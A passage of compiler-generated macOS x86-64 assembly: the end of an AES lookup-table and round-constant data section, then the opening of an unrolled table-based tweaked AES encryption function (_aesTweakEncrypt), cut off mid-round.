.long 269488144 ; 0x10101010
.long 1499027801 ; 0x59595959
.long 656877351 ; 0x27272727
.long 2155905152 ; 0x80808080
.long 3974950124 ; 0xecececec
.long 1600085855 ; 0x5f5f5f5f
.long 1616928864 ; 0x60606060
.long 1364283729 ; 0x51515151
.long 2139062143 ; 0x7f7f7f7f
.long 2846468521 ; 0xa9a9a9a9
.long 421075225 ; 0x19191919
.long 3048584629 ; 0xb5b5b5b5
.long 1246382666 ; 0x4a4a4a4a
.long 218959117 ; 0xd0d0d0d
.long 757935405 ; 0x2d2d2d2d
.long 3857049061 ; 0xe5e5e5e5
.long 2054847098 ; 0x7a7a7a7a
.long 2678038431 ; 0x9f9f9f9f
.long 2475922323 ; 0x93939393
.long 3385444809 ; 0xc9c9c9c9
.long 2627509404 ; 0x9c9c9c9c
.long 4025479151 ; 0xefefefef
.long 2694881440 ; 0xa0a0a0a0
.long 3772834016 ; 0xe0e0e0e0
.long 993737531 ; 0x3b3b3b3b
.long 1296911693 ; 0x4d4d4d4d
.long 2930683566 ; 0xaeaeaeae
.long 707406378 ; 0x2a2a2a2a
.long 4126537205 ; 0xf5f5f5f5
.long 2964369584 ; 0xb0b0b0b0
.long 3368601800 ; 0xc8c8c8c8
.long 3958107115 ; 0xebebebeb
.long 3149642683 ; 0xbbbbbbbb
.long 1010580540 ; 0x3c3c3c3c
.long 2206434179 ; 0x83838383
.long 1397969747 ; 0x53535353
.long 2576980377 ; 0x99999999
.long 1633771873 ; 0x61616161
.long 387389207 ; 0x17171717
.long 724249387 ; 0x2b2b2b2b
.long 67372036 ; 0x4040404
.long 2122219134 ; 0x7e7e7e7e
.long 3132799674 ; 0xbabababa
.long 2004318071 ; 0x77777777
.long 3604403926 ; 0xd6d6d6d6
.long 640034342 ; 0x26262626
.long 3789677025 ; 0xe1e1e1e1
.long 1768515945 ; 0x69696969
.long 336860180 ; 0x14141414
.long 1667457891 ; 0x63636363
.long 1431655765 ; 0x55555555
.long 555819297 ; 0x21212121
.long 202116108 ; 0xc0c0c0c
.long 2105376125 ; 0x7d7d7d7d
.p2align 2 ; @rcon
_rcon:
.long 16777216 ; 0x1000000
.long 33554432 ; 0x2000000
.long 67108864 ; 0x4000000
.long 134217728 ; 0x8000000
.long 268435456 ; 0x10000000
.long 536870912 ; 0x20000000
.long 1073741824 ; 0x40000000
.long 2147483648 ; 0x80000000
.long 452984832 ; 0x1b000000
.long 905969664 ; 0x36000000
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _aesTweakEncrypt ## -- Begin function aesTweakEncrypt
.p2align 4, 0x90
_aesTweakEncrypt: ## @aesTweakEncrypt
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $272, %rsp ## imm = 0x110
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movq %rdi, -216(%rbp)
movq %rsi, -224(%rbp)
movq %rdx, -232(%rbp)
movq %rcx, -240(%rbp)
leaq -192(%rbp), %rdi
movq -224(%rbp), %rsi
callq _aesKeySetupEnc
movq -232(%rbp), %rax
movzbl (%rax), %eax
shll $24, %eax
movq -232(%rbp), %rcx
movzbl 1(%rcx), %ecx
shll $16, %ecx
xorl %ecx, %eax
movl %eax, -208(%rbp)
movq -232(%rbp), %rax
movzbl 2(%rax), %eax
shll $24, %eax
movq -232(%rbp), %rcx
movzbl 3(%rcx), %ecx
shll $16, %ecx
xorl %ecx, %eax
movl %eax, -204(%rbp)
movq -232(%rbp), %rax
movzbl 4(%rax), %eax
shll $24, %eax
movq -232(%rbp), %rcx
movzbl 5(%rcx), %ecx
shll $16, %ecx
xorl %ecx, %eax
movl %eax, -200(%rbp)
movq -232(%rbp), %rax
movzbl 6(%rax), %eax
shll $24, %eax
movq -232(%rbp), %rcx
movzbl 7(%rcx), %ecx
shll $16, %ecx
xorl %ecx, %eax
movl %eax, -196(%rbp)
movq -216(%rbp), %rax
movzbl (%rax), %eax
shll $24, %eax
movq -216(%rbp), %rcx
movzbl 1(%rcx), %ecx
shll $16, %ecx
xorl %ecx, %eax
movq -216(%rbp), %rcx
movzbl 2(%rcx), %ecx
shll $8, %ecx
xorl %ecx, %eax
movq -216(%rbp), %rcx
movzbl 3(%rcx), %ecx
xorl %ecx, %eax
xorl -192(%rbp), %eax
xorl -208(%rbp), %eax
movl %eax, -244(%rbp)
movq -216(%rbp), %rax
movzbl 4(%rax), %eax
shll $24, %eax
movq -216(%rbp), %rcx
movzbl 5(%rcx), %ecx
shll $16, %ecx
xorl %ecx, %eax
movq -216(%rbp), %rcx
movzbl 6(%rcx), %ecx
shll $8, %ecx
xorl %ecx, %eax
movq -216(%rbp), %rcx
movzbl 7(%rcx), %ecx
xorl %ecx, %eax
xorl -188(%rbp), %eax
xorl -204(%rbp), %eax
movl %eax, -248(%rbp)
movq -216(%rbp), %rax
movzbl 8(%rax), %eax
shll $24, %eax
movq -216(%rbp), %rcx
movzbl 9(%rcx), %ecx
shll $16, %ecx
xorl %ecx, %eax
movq -216(%rbp), %rcx
movzbl 10(%rcx), %ecx
shll $8, %ecx
xorl %ecx, %eax
movq -216(%rbp), %rcx
movzbl 11(%rcx), %ecx
xorl %ecx, %eax
xorl -184(%rbp), %eax
xorl -200(%rbp), %eax
movl %eax, -252(%rbp)
movq -216(%rbp), %rax
movzbl 12(%rax), %eax
shll $24, %eax
movq -216(%rbp), %rcx
movzbl 13(%rcx), %ecx
shll $16, %ecx
xorl %ecx, %eax
movq -216(%rbp), %rcx
movzbl 14(%rcx), %ecx
shll $8, %ecx
xorl %ecx, %eax
movq -216(%rbp), %rcx
movzbl 15(%rcx), %ecx
xorl %ecx, %eax
xorl -180(%rbp), %eax
xorl -196(%rbp), %eax
movl %eax, -256(%rbp)
movl -244(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -248(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -252(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -256(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -176(%rbp), %eax
xorl -208(%rbp), %eax
movl %eax, -260(%rbp)
movl -248(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -252(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -256(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -244(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -172(%rbp), %eax
xorl -204(%rbp), %eax
movl %eax, -264(%rbp)
movl -252(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -256(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -244(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -248(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -168(%rbp), %eax
xorl -200(%rbp), %eax
movl %eax, -268(%rbp)
movl -256(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -244(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -248(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -252(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -164(%rbp), %eax
xorl -196(%rbp), %eax
movl %eax, -272(%rbp)
movl -260(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -264(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -268(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -272(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -160(%rbp), %eax
xorl -208(%rbp), %eax
movl %eax, -244(%rbp)
movl -264(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -268(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -272(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -260(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -156(%rbp), %eax
xorl -204(%rbp), %eax
movl %eax, -248(%rbp)
movl -268(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -272(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -260(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -264(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -152(%rbp), %eax
xorl -200(%rbp), %eax
movl %eax, -252(%rbp)
movl -272(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -260(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -264(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -268(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -148(%rbp), %eax
xorl -196(%rbp), %eax
movl %eax, -256(%rbp)
movl -244(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -248(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -252(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -256(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -144(%rbp), %eax
xorl -208(%rbp), %eax
movl %eax, -260(%rbp)
movl -248(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -252(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -256(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -244(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -140(%rbp), %eax
xorl -204(%rbp), %eax
movl %eax, -264(%rbp)
movl -252(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -256(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -244(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -248(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -136(%rbp), %eax
xorl -200(%rbp), %eax
movl %eax, -268(%rbp)
movl -256(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -244(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -248(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -252(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -132(%rbp), %eax
xorl -196(%rbp), %eax
movl %eax, -272(%rbp)
movl -260(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -264(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -268(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -272(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -128(%rbp), %eax
xorl -208(%rbp), %eax
movl %eax, -244(%rbp)
movl -264(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -268(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -272(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -260(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -124(%rbp), %eax
xorl -204(%rbp), %eax
movl %eax, -248(%rbp)
movl -268(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -272(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -260(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -264(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -120(%rbp), %eax
xorl -200(%rbp), %eax
movl %eax, -252(%rbp)
movl -272(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -260(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -264(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -268(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -116(%rbp), %eax
xorl -196(%rbp), %eax
movl %eax, -256(%rbp)
movl -244(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -248(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -252(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -256(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -112(%rbp), %eax
xorl -208(%rbp), %eax
movl %eax, -260(%rbp)
movl -248(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -252(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -256(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -244(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -108(%rbp), %eax
xorl -204(%rbp), %eax
movl %eax, -264(%rbp)
movl -252(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -256(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -244(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -248(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -104(%rbp), %eax
xorl -200(%rbp), %eax
movl %eax, -268(%rbp)
movl -256(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -244(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -248(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -252(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -100(%rbp), %eax
xorl -196(%rbp), %eax
movl %eax, -272(%rbp)
movl -260(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -264(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -268(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -272(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -96(%rbp), %eax
xorl -208(%rbp), %eax
movl %eax, -244(%rbp)
movl -264(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -268(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -272(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -260(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -92(%rbp), %eax
xorl -204(%rbp), %eax
movl %eax, -248(%rbp)
movl -268(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -272(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -260(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -264(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -88(%rbp), %eax
xorl -200(%rbp), %eax
movl %eax, -252(%rbp)
movl -272(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -260(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -264(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -268(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -84(%rbp), %eax
xorl -196(%rbp), %eax
movl %eax, -256(%rbp)
movl -244(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -248(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -252(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -256(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -80(%rbp), %eax
xorl -208(%rbp), %eax
movl %eax, -260(%rbp)
movl -248(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -252(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -256(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -244(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -76(%rbp), %eax
xorl -204(%rbp), %eax
movl %eax, -264(%rbp)
movl -252(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -256(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -244(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -248(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -72(%rbp), %eax
xorl -200(%rbp), %eax
movl %eax, -268(%rbp)
movl -256(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -244(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -248(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -252(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -68(%rbp), %eax
xorl -196(%rbp), %eax
movl %eax, -272(%rbp)
movl -260(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -264(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -268(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -272(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -64(%rbp), %eax
xorl -208(%rbp), %eax
movl %eax, -244(%rbp)
movl -264(%rbp), %eax
shrl $24, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _Te0(%rip), %rax
movl (%rax,%rcx,4), %eax
movl -268(%rbp), %ecx
shrl $16, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te1(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -272(%rbp), %ecx
shrl $8, %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te2(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
movl -260(%rbp), %ecx
andl $255, %ecx
movl %ecx, %ecx
movl %ecx, %edx
leaq _Te3(%rip), %rcx
xorl (%rcx,%rdx,4), %eax
xorl -60(%rbp), %eax
